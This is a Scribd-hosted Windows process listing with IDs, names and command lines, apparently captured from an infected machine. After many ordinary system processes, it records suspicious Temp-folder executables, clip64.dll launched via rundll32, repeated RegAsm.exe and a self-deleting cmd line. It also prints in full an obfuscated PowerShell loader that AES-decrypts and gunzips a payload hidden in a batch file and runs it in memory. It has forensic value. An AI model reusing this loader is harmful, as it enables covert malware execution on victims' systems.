Scribd
Upload
107 views

Process List

The document lists process information from a system, including the process ID, name, and command line. It includes common system processes like csrss.exe, winlogon.exe, and explorer.exe as well as applications like RiotClientServices.exe, AdobeIPCBroker.exe, and TotalCMD.exe. A variety of other processes are also referenced, indicating it is summarizing process information from an active system.

Uploaded by

matheus23kayna
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
107 views

Process List

The document lists process information from a system, including the process ID, name, and command line. It includes common system processes like csrss.exe, winlogon.exe, and explorer.exe as well as applications like RiotClientServices.exe, AdobeIPCBroker.exe, and TotalCMD.exe. A variety of other processes are also referenced, indicating it is summarizing process information from an active system.

Uploaded by

matheus23kayna
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

ID: 912, Name: csrss.

exe, CommandLine:
===============
ID: 1172, Name: winlogon.exe, CommandLine:
===============
ID: 1228, Name: fontdrvhost.exe, CommandLine:
===============
ID: 1300, Name: dwm.exe, CommandLine:
===============
ID: 2644, Name: atieclxx.exe, CommandLine:
===============
ID: 7072, Name: sihost.exe, CommandLine: sihost.exe
===============
ID: 6544, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s CDPUserSvc
===============
ID: 6924, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
UnistackSvcGroup -s WpnUserService
===============
ID: 6868, Name: AsusDownLoadLicense.exe, CommandLine: C:\Windows\system32\
AsusDownLoadLicense.exe -asus2357start -hide
===============
ID: 3664, Name: taskhostw.exe, CommandLine: taskhostw.exe {222A245B-E637-4AE9-A93F-
A59CA119A75E}
===============
ID: 7432, Name: ctfmon.exe, CommandLine:
===============
ID: 7688, Name: explorer.exe, CommandLine: C:\Windows\Explorer.EXE
===============
ID: 7952, Name: svchost.exe, CommandLine: C:\Windows\system32\svchost.exe -k
ClipboardSvcGroup -p -s cbdhsvc
===============
ID: 8208, Name: StartMenuExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\
StartMenuExperienceHost.exe" -
ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
===============
ID: 8432, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 8636, Name: SearchApp.exe, CommandLine: "C:\Windows\SystemApps\
Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -
ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
===============
ID: 8764, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9992, Name: PhoneExperienceHost.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.YourPhone_1.23112.87.0_x64__8wekyb3d8bbwe\
PhoneExperienceHost.exe" -ComServer:Background -Embedding
===============
ID: 9468, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10340, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 10888, Name: TextInputHost.exe, CommandLine: "C:\Windows\SystemApps\
MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -
ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca
===============
ID: 11332, Name: SecurityHealthSystray.exe, CommandLine: "C:\Windows\System32\
SecurityHealthSystray.exe"
===============
ID: 11484, Name: tvnserver.exe, CommandLine: "C:\Program Files\TightVNC\
tvnserver.exe" -controlservice -slave
===============
ID: 11544, Name: AvastUI.exe, CommandLine: AvastUI.exe /nogui
===============
ID: 11568, Name: vgtray.exe, CommandLine: "C:\Program Files\Riot Vanguard\
vgtray.exe"
===============
ID: 11616, Name: OneDrive.exe, CommandLine: "C:\Users\User\AppData\Local\Microsoft\
OneDrive\OneDrive.exe" /background
===============
ID: 12032, Name: CCXProcess.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\CCXProcess.exe"
===============
ID: 12048, Name: node.exe, CommandLine: "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\libs\node.exe" "C:\Program Files (x86)\Adobe\Adobe
Creative Cloud Experience\js\main.js"
===============
ID: 12056, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 12132, Name: RiotClientServices.exe, CommandLine: "C:\Riot Games\Riot Client\
RiotClientServices.exe" --launch-background-mode
===============
ID: 12236, Name: AdobeIPCBroker.exe, CommandLine: "C:\Program Files (x86)\Common
Files\Adobe\Adobe Desktop Common\IPCBox\AdobeIPCBroker.exe" "-launchedbyvulcan-
12048 C:\Program Files (x86)\Adobe\Adobe Creative Cloud Experience\libs\node.exe"
===============
ID: 1576, Name: RiotClientCrashHandler.exe, CommandLine: "C:\Riot Games\Riot
Client\RiotClientCrashHandler.exe" --no-rate-limit "--attachment=2024-01-28T23-18-
08_12132_Riot_Client.0.log=C:/Users/User/AppData/Local/Riot Games/Riot
Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot Client.0.log" "--
attachment=2024-01-28T23-18-08_12132_Riot_Client.log=C:/Users/User/AppData/Local/
Riot Games/Riot Client/Logs/Riot Client Logs/2024-01-28T23-18-08_12132_Riot
Client.log" "--attachment=__sentry-breadcrumb1=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-376224f92530.run\
__sentry-breadcrumb1" "--attachment=__sentry-breadcrumb2=C:\Users\User\AppData\
Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-breadcrumb2" "--attachment=__sentry-event=C:\Users\User\
AppData\Local\Riot Games\Riot Client\Crashes\Riot Client\db9afdf1-c7b1-4eb8-8410-
376224f92530.run\__sentry-event" "--database=C:\Users\User\AppData\Local\Riot
Games\Riot Client\Crashes\Riot Client" "--metrics-dir=C:\Users\User\AppData\Local\
Riot Games\Riot Client\Crashes\Riot Client"
--url=https://sentry.io:443/api/1339107/minidump/?
sentry_key=dc54709324504ab18ddf517a83f99e1a --initial-client-
data=0x378,0x3f8,0x3c8,0x384,0x3e0,0x6f64ed88,0x6f64ed98,0x6f64eda8
===============
ID: 12968, Name: TokenUtil.exe, CommandLine: "C:\Program Files\TrustEdgeID\
TokenUtil.exe"
===============
ID: 13048, Name: jusched.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jusched.exe"
===============
ID: 13108, Name: NativeInstrumentsUsbAudioCpl.exe, CommandLine: "C:\Program Files\
Native Instruments\Komplete Audio Driver\W10_x64\NativeInstrumentsUsbAudioCpl.exe"
-hide
===============
ID: 13220, Name: RadeonSoftware.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\Radeonsoftware.exe" atlogon
===============
ID: 4892, Name: cncmd.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
cncmd.exe" watch 13220
===============
ID: 12700, Name: AMDRSServ.exe, CommandLine:
===============
ID: 7664, Name: amdow.exe, CommandLine:
===============
ID: 1188, Name: MSOSYNC.EXE, CommandLine: "C:\Program Files\Microsoft Office\
Office15\MsoSync.exe"
===============
ID: 2860, Name: ApplicationFrameHost.exe, CommandLine: C:\Windows\system32\
ApplicationFrameHost.exe -Embedding
===============
ID: 11460, Name: Microsoft.Media.Player.exe, CommandLine: "C:\Program Files\
WindowsApps\Microsoft.ZuneMusic_11.2312.7.0_x64__8wekyb3d8bbwe\
Microsoft.Media.Player.exe" -
ServerName:Microsoft.ZuneMusic.AppXr954g6gg1tvs748d5g67zt981dvpmnr6.mca
===============
ID: 8372, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9348, Name: svchost.exe, CommandLine: C:\Windows\System32\svchost.exe -k
UnistackSvcGroup
===============
ID: 12828, Name: dllhost.exe, CommandLine: C:\Windows\system32\DllHost.exe
/Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
===============
ID: 10116, Name: jucheck.exe, CommandLine: "C:\Program Files (x86)\Common Files\
Java\Java Update\jucheck.exe" -auto
===============
ID: 13648, Name: QtWebEngineProcess.exe, CommandLine: "C:\Program Files\AMD\CNext\
CNext\QtWebEngineProcess.exe" --type=utility --enable-
features=AllowContentInitiatedDataUrlNavigations,TracingServiceInProcess --disable-
features=BackgroundFetch,ConsolidatedMovementXY,DnsOverHttpsUpgrade,FormControlsRef
resh,MojoVideoCapture,PictureInPicture,SmsReceiver,UseSkiaRenderer,WebPayments,WebU
SB --lang=sr --service-sandbox-type=network --use-gl=angle --application-
name=Radeonsoftware --webengine-schemes=qrc:sLV --mojo-platform-channel-handle=5208
/prefetch:8
===============
ID: 4216, Name: AMDRSSrcExt.exe, CommandLine: "C:\Program Files\AMD\CNext\CNext\
AMDRSSrcExt.exe" fb28e830-7c29-4591-b2df-4e16275fa0d9 SOFTWARE\AMD\DVR\Overlays
===============
ID: 8616, Name: smartscreen.exe, CommandLine: C:\Windows\System32\smartscreen.exe -
Embedding
===============
ID: 9880, Name: TOTALCMD.EXE, CommandLine: "E:\Instalacije\Totalcmd\TOTALCMD.EXE"
===============
ID: 5152, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=gpu-process --field-trial-
handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --no-sandbox --disable-gpu-driver-bug-
workarounds --log-file="C:\Users\User\AppData\Roaming\Avast Software\Avast\log\
cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0 AppleWebKit/537.36
(KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium (0.0.0) (Windows
10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --force-wave-audio
--disable-software-rasterizer --no-sandbox --blacklist-accelerated-compositing --
disable-accelerated-2d-canvas --disable-accelerated-compositing --disable-
accelerated-layers --disable-accelerated-video-decode --blacklist-webgl --disable-
bundled-ppapi-flash --disable-flash-3d --enable-aggressive-domstorage-flushing --
enable-media-stream --disable-gpu --disable-webgl --disable-gpu-compositing --
allow-file-access-from-files=1 --pack_loading_disabled=1 --gpu-
preferences=SAAAAAAAAADgAABwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAA
AAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIA
AAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --log-file="C:\Users\User\AppData\
Roaming\Avast Software\Avast\log\cef_log.txt" --mojo-platform-channel-
handle=8416 /prefetch:2
===============
ID: 4712, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=utility --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8608 /prefetch:8
===============
ID: 12392, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --
field-trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=none --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=8660 /prefetch:8
===============
ID: 9868, Name: AvastUI.exe, CommandLine: "C:\Program Files\Avast Software\Avast\
AvastUI.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-
trial-handle=8360,3878373468549405587,10135637355546976036,131072 --disable-
features=CookiesWithoutSameSiteMustBeSecure,ForcedColors,SameSiteByDefaultCookies,S
ameSiteDefaultChecksMethodRigorously --lang=sr --service-sandbox-type=audio --no-
sandbox --force-wave-audio --log-file="C:\Users\User\AppData\Roaming\Avast
Software\Avast\log\cef_log.txt" --log-severity=error --user-agent="Mozilla/5.0
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.3.3626.1895 Safari/537.36 Avastium
(0.0.0) (Windows 10.0)" --lang=sr-Latn-RS --proxy-auto-detect --disable-webaudio --
force-wave-audio --disable-software-rasterizer --no-sandbox --blacklist-
accelerated-compositing --disable-accelerated-2d-canvas --disable-accelerated-
compositing --disable-accelerated-layers --disable-accelerated-video-decode --
blacklist-webgl --disable-bundled-ppapi-flash --disable-flash-3d --enable-
aggressive-domstorage-flushing --enable-media-stream --disable-gpu --disable-webgl
--disable-gpu-compositing --allow-file-access-from-files=1 --
pack_loading_disabled=1 --log-file="C:\Users\User\AppData\Roaming\Avast Software\
Avast\log\cef_log.txt" --mojo-platform-channel-handle=10108 /prefetch:8
===============
ID: 12584, Name: ShellExperienceHost.exe, CommandLine: "C:\Windows\SystemApps\
ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -
ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
===============
ID: 5060, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 13356, Name: UserOOBEBroker.exe, CommandLine: C:\Windows\System32\oobe\
UserOOBEBroker.exe -Embedding
===============
ID: 7412, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe"
===============
ID: 3508, Name: AdobeCollabSync.exe, CommandLine: "C:\Program Files\Adobe\Acrobat
DC\Acrobat\AdobeCollabSync.exe" --type=collab-renderer --proc=7412
===============
ID: 9876, Name: DPService.exe, CommandLine:
===============
ID: 13096, Name: 1FF3.exe, CommandLine: C:\Users\User\AppData\Local\Temp\1FF3.exe
===============
ID: 4120, Name: build2.exe, CommandLine: "C:\Users\User\AppData\Local\f4728982-
a5a0-4742-973b-67968a402246\build2.exe"
===============
ID: 11312, Name: 9883.exe, CommandLine: C:\Users\User\AppData\Local\Temp\9883.exe
===============
ID: 10264, Name: explorhe.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\explorhe.exe"
===============
ID: 13132, Name: RuntimeBroker.exe, CommandLine: C:\Windows\System32\
RuntimeBroker.exe -Embedding
===============
ID: 9576, Name: fz9YqoSLnCrtpx1uiHT8.exe, CommandLine: "C:\Users\User\AppData\
Local\Temp\jobA4aodo3bpwLTVri\fz9YqoSLnCrtpx1uiHT8.exe"
===============
ID: 12004, Name: CompPkgSrv.exe, CommandLine: C:\Windows\System32\CompPkgSrv.exe -
Embedding
===============
ID: 14608, Name: launcher.exe, CommandLine:
===============
ID: 14760, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 14780, Name: opera_autoupdate.exe, CommandLine:
===============
ID: 11964, Name: btcgood.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000718001\btcgood.exe"
===============
ID: 3620, Name: 2024.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000721001\2024.exe"
===============
ID: 14900, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c C:\Users\
User\AppData\Local\Temp\file1.bat
===============
ID: 14928, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 10204, Name: conhost.exe, CommandLine: C:\Windows\system32\conhost.exe
===============
ID: 11480, Name: conhost.exe, CommandLine: conhost.exe
===============
ID: 9708, Name: file1.bat.exe, CommandLine: "file1.bat.exe" -noprofile -
windowstyle hidden -ep bypass -command $_CASH_qaVPf = [System.IO.File]::
('txeTllAdaeR'[-1..-11] -join '')('C:\Users\User\AppData\Local\Temp\
file1.bat').Split([Environment]::NewLine);foreach ($_CASH_fIZHT in $_CASH_qaVPf)
{ if ($_CASH_fIZHT.StartsWith(':: @')) { $_CASH_XqEBS = $_CASH_fIZHT.Substring(4);
break; }; };$_CASH_XqEBS =
[System.Text.RegularExpressions.Regex]::Replace($_CASH_XqEBS, '_CASH_', '');
$_CASH_AbGjb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
($_CASH_XqEBS);$_CASH_xbtcQ = New-Object System.Security.Cryptography.AesManaged;
$_CASH_xbtcQ.Mode = [System.Security.Cryptography.CipherMode]::CBC;
$_CASH_xbtcQ.Padding =
[System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_xbtcQ.Key =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('xnU+qixX8GxmNdtUiuJWKTS5382DUH1RFgNRqJG+Kzg=');$_CASH_xbtcQ.IV =
[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')
('q4+6cHkazpcj3F4mKI+rYw==');$_CASH_KXHue = $_CASH_xbtcQ.CreateDecryptor();
$_CASH_AbGjb = $_CASH_KXHue.TransformFinalBlock($_CASH_AbGjb, 0,
$_CASH_AbGjb.Length);$_CASH_KXHue.Dispose();$_CASH_xbtcQ.Dispose();$_CASH_kEHGI =
New-Object System.IO.MemoryStream(, $_CASH_AbGjb);$_CASH_Kscdn = New-Object
System.IO.MemoryStream;$_CASH_Lfmtj = New-Object
System.IO.Compression.GZipStream($_CASH_kEHGI,
[IO.Compression.CompressionMode]::Decompress);$_CASH_Lfmtj.CopyTo($_CASH_Kscdn);
$_CASH_Lfmtj.Dispose();$_CASH_kEHGI.Dispose();$_CASH_Kscdn.Dispose();$_CASH_AbGjb =
$_CASH_Kscdn.ToArray();$_CASH_kHyYf = [System.Reflection.Assembly]::('daoL'[-1..-4]
-join '')($_CASH_AbGjb);$_CASH_ZMxsS = $_CASH_kHyYf.EntryPoint;
$_CASH_ZMxsS.Invoke($null, (, [string[]] ('')))
===============
ID: 3688, Name: rty25.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
rty25.exe"
===============
ID: 10724, Name: powershell.exe, CommandLine: C:\Windows\system32\
WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\User\AppData\Local\
Temp\FirstZ.exe" -Verb runAs
===============
ID: 1376, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 9024, Name: consent.exe, CommandLine:
===============
ID: 13452, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 13336, Name: explorer.exe, CommandLine: explorer.exe
===============
ID: 13392, Name: consent.exe, CommandLine:
===============
ID: 12588, Name: consent.exe, CommandLine:
===============
ID: 2208, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 12296, Name: sadsadsadsa.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
1000726001\sadsadsadsa.exe"
===============
ID: 12448, Name: olehps.exe, CommandLine: "C:\Users\User\AppData\Roaming\
configurationValue\olehps.exe"
===============
ID: 9584, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 7984, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 3364, Name: 7b0d48dbbf50fe239f1097f5d01c2a6d.exe, CommandLine:
===============
ID: 4148, Name: RegAsm.exe, CommandLine: "C:\Windows\Microsoft.NET\Framework\
v4.0.30319\RegAsm.exe"
===============
ID: 10660, Name: LogonUI.exe, CommandLine:
===============
ID: 4636, Name: consent.exe, CommandLine:
===============
ID: 10740, Name: cmd.exe, CommandLine: C:\Windows\system32\cmd.exe /c choice /C
Y /N /D Y /T 3 & Del "C:\Users\User\AppData\Local\Temp\1000731001\moto.exe"
===============
ID: 11744, Name: conhost.exe, CommandLine: \??\C:\Windows\system32\conhost.exe 0x4
===============
ID: 11840, Name: rundll32.exe, CommandLine: "C:\Windows\System32\rundll32.exe" C:\
Users\User\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
===============
ID: 2000, Name: choice.exe, CommandLine: choice /C Y /N /D Y /T 3
===============
ID: 8036, Name: powershell.exe, CommandLine:
===============
ID: 3644, Name: conhost.exe, CommandLine:
===============
ID: 8668, Name: qemu-ga.exe, CommandLine: "C:\Users\User\AppData\Local\Temp\
d887ceb89d\qemu-ga.exe"

You might also like